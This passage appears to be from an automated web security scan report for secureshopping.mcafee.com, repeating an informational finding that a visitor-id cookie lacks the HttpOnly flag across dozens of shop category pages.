4.79. http://secureshopping.mcafee.com/browse/baby/health/diaper-rash-ointment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/diaper-rash-ointment/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.80. http://secureshopping.mcafee.com/browse/baby/health/pacifiers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/pacifiers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:49 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.81. http://secureshopping.mcafee.com/browse/baby/health/teethers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/teethers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:52 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.82. http://secureshopping.mcafee.com/browse/baby/health/teething-relief/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/teething-relief/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:53 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.83. http://secureshopping.mcafee.com/browse/baby/health/thermometers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/thermometers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:55 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.84. http://secureshopping.mcafee.com/browse/baby/health/toilet-training/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/toilet-training/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.85. http://secureshopping.mcafee.com/browse/baby/safety/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:35 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.86. http://secureshopping.mcafee.com/browse/baby/safety/baby-monitors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/baby-monitors/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.87. http://secureshopping.mcafee.com/browse/baby/safety/bath-safety/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/bath-safety/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:40 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.88. http://secureshopping.mcafee.com/browse/baby/safety/door-knob-covers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/door-knob-covers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:42 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.89. http://secureshopping.mcafee.com/browse/baby/safety/drawer-cabinet-locks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/drawer-cabinet-locks/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:44 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.90. http://secureshopping.mcafee.com/browse/baby/safety/night-lights/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/night-lights/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:45 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.91. http://secureshopping.mcafee.com/browse/baby/safety/outlet-covers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/outlet-covers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:46 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.92. http://secureshopping.mcafee.com/browse/baby/safety/safety-gates/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/safety-gates/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:46 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.93. http://secureshopping.mcafee.com/browse/baby/safety/safety-kits/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/safety-kits/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.94. http://secureshopping.mcafee.com/browse/baby/toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:34 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.95. http://secureshopping.mcafee.com/browse/baby/toys/activity-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/activity-toys/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:34 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.96. http://secureshopping.mcafee.com/browse/baby/toys/bath-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/bath-toys/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:38 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.97. http://secureshopping.mcafee.com/browse/baby/toys/learning-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/learning-toys/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:38 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.98. http://secureshopping.mcafee.com/browse/baby/toys/mobiles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/mobiles/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:42 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.99. http://secureshopping.mcafee.com/browse/baby/toys/music-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/music-toys/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:43 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.100. http://secureshopping.mcafee.com/browse/baby/toys/play-gyms-mats/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/play-gyms-mats/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:44 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.101. http://secureshopping.mcafee.com/browse/baby/toys/pull-along-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/pull-along-toys/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:45 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.102. http://secureshopping.mcafee.com/browse/baby/toys/rattles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/rattles/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.103. http://secureshopping.mcafee.com/browse/baby/toys/stuffed-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/stuffed-toys/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:49 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.104. http://secureshopping.mcafee.com/browse/baby/travel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/travel/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:54 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.105. http://secureshopping.mcafee.com/browse/baby/travel/baby-carriers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/travel/baby-carriers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.106. http://secureshopping.mcafee.com/browse/baby/travel/car-seats/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/travel/car-seats/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:57 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.107. http://secureshopping.mcafee.com/browse/baby/travel/strollers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/travel/strollers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:57 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.108. http://secureshopping.mcafee.com/browse/clothing-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/clothing-accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.109. http://secureshopping.mcafee.com/browse/clothing-accessories/jewelry-watches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/clothing-accessories/jewelry-watches/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:05 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.110. http://secureshopping.mcafee.com/browse/collectibles-art/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/collectibles-art/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.111. http://secureshopping.mcafee.com/browse/computers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:49 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.112. http://secureshopping.mcafee.com/browse/computers/accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:05 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.113. http://secureshopping.mcafee.com/browse/computers/accessories/audio-video-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/audio-video-accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.114. http://secureshopping.mcafee.com/browse/computers/accessories/bags,-cases-covers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/bags,-cases-covers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:12 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.115. http://secureshopping.mcafee.com/browse/computers/accessories/batteries-chargers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/batteries-chargers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:12 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.116. http://secureshopping.mcafee.com/browse/computers/accessories/camcorder-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/camcorder-accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:12 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.117. http://secureshopping.mcafee.com/browse/computers/accessories/camera-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/camera-accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:13 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.118. http://secureshopping.mcafee.com/browse/computers/accessories/camera-lenses/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/camera-lenses/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:13 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.119. http://secureshopping.mcafee.com/browse/computers/accessories/cell-phone-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/cell-phone-accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:13 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.120. http://secureshopping.mcafee.com/browse/computers/accessories/desktop-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/desktop-accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:14 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.121. http://secureshopping.mcafee.com/browse/computers/accessories/gps-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/gps-accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:15 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.122. http://secureshopping.mcafee.com/browse/computers/accessories/headphones/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/headphones/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.123. http://secureshopping.mcafee.com/browse/computers/accessories/microphones/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/microphones/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.124. http://secureshopping.mcafee.com/browse/computers/accessories/monitor-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/monitor-accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:18 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.125. http://secureshopping.mcafee.com/browse/computers/accessories/mp3-player-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/mp3-player-accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:21 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.126. http://secureshopping.mcafee.com/browse/computers/accessories/notebook-pda-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/notebook-pda-accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:23 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.127. http://secureshopping.mcafee.com/browse/computers/accessories/paper-supplies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/paper-supplies/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:23 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.128. http://secureshopping.mcafee.com/browse/computers/accessories/printer-supplies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/printer-supplies/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:24 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.129. http://secureshopping.mcafee.com/browse/computers/accessories/racks,-mounts-cabinets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/racks,-mounts-cabinets/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:29 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.130. http://secureshopping.mcafee.com/browse/computers/accessories/remote-controls/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/remote-controls/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.131. http://secureshopping.mcafee.com/browse/computers/accessories/scanner-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/scanner-accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:34 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.132. http://secureshopping.mcafee.com/browse/computers/accessories/storage-media/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/storage-media/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:35 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.133. http://secureshopping.mcafee.com/browse/computers/cables-adapters/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cables-adapters/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.134. http://secureshopping.mcafee.com/browse/computers/cpu,-chassis-components/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cpu,-chassis-components/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.135. http://secureshopping.mcafee.com/browse/computers/cpu,-chassis-components/cases/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cpu,-chassis-components/cases/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:38 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.136. http://secureshopping.mcafee.com/browse/computers/cpu,-chassis-components/cpu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cpu,-chassis-components/cpu/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:45 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.137. http://secureshopping.mcafee.com/browse/computers/cpu,-chassis-components/motherboards/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cpu,-chassis-components/motherboards/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:46 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.138. http://secureshopping.mcafee.com/browse/computers/desktops/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/desktops/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:47 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.139. http://secureshopping.mcafee.com/browse/computers/graphics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/graphics/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.140. http://secureshopping.mcafee.com/browse/computers/handhelds-pda/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/handhelds-pda/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:49 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.141. http://secureshopping.mcafee.com/browse/computers/input-devices/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/input-devices/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:49 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.142. http://secureshopping.mcafee.com/browse/computers/input-devices/joysticks-gamepads/ previous next

Summary

Severity:	Information
Confidence:	Certain
